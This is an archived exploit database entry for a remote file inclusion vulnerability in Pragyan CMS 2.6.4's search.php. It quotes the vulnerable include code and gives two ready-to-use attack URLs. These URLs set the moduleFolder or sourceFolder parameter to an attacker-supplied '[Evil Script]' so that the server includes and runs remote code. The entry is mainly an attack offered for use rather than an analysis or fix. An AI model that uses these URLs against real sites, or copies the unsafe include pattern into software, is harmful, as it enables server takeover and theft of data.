Pragyan CMS 2.6.4 (Search.php) Remote File Inclusion Vulnerability

2009-12-24T00:00:00
ID 1337DAY-ID-10380
Type zdt
Reporter Mr.SeCreT
Modified 2009-12-24T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================================
Pragyan CMS 2.6.4 (Search.php) Remote File Inclusion Vulnerability
==================================================================

############## Script Information: #########################
Scipt: Pragyan CMS 2.6.4 (Search.php) Remote File Inclusion Vulnerability
Language: PHP
Download: http://garr.dl.sourceforge.net/project/pragyan/pragyan/2.6.4/pragyan-2.6.4.tar.gz
register_globals = On
 
################### Vul Code: ##############################
$searchModuleFolder = "$sourceFolder/$moduleFolder/search";
$include_dir = "$searchModuleFolder/include";
include ("$include_dir/commonfuncs.php");
 
################### Exploit: ###############################
www.site.com/path/cms/modules/search/search.php?moduleFolder=[Evil<http://www.site.com/path/cms/modules/search/search.php?moduleFolder=[Evil> Script]
www.site.com/path/cms/modules/search/search.php?sourceFolder=[Evil<http://www.site.com/path/cms/modules/search/search.php?sourceFolder=[Evil> Script]
 
############################################################



#  0day.today [2018-01-01]  #